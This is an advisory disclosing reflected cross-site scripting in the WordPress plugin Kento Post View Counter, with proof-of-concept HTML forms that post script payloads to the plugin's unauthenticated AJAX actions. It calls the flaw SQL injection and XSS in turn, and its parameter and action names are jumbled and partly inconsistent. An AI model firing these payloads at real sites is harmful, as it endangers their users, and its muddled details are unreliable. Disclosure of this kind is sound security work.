Kento Post View Counter [Reflected XSS]
Description
WordPress plugin Kento Post View Counter Plugin is vulnerable to SQL Injection attacks.
The plugin registers an AJAX actions
kento_pvc_top_geo
kento_pvc_top_referer
which are available to nor registered users also.
Vulnerable params are
$_POST['kento_pvc_geo']
forkento_pvc_top_geo
action$_POST['kpvc_date_referer']
forkento_pvc_top_referer
action
Action kento_pvc_top_geo
and can be exploited for SQL injection also
(DWF-2016-87021).
PoC
<p>Action: kento_pvc_top_geo</p>
<form action="//wp1.dev/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="kento_pvc_top_geo">
<input type="hidden" name="kento_pvc_geo" value="<script>alert(String.fromCharCode(88, 83, 83))</script>">
<button type="submit">Press Me</button>
</form>
<p>Action: kpvc_date_referer</p>
<form action="//wp1.dev/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="kpvc_date_referer">
<input type="hidden" name="kpvc_date_referer" value="<script>alert(String.fromCharCode(88, 83, 83))</script>">
<button type="submit">Press Me</button>
</form>
INFO
- 19 April 2016
- Pan Vag
- kentothemes.com
- Kento Post View Counter
- WordPress 4.5
- DWF-2016-87022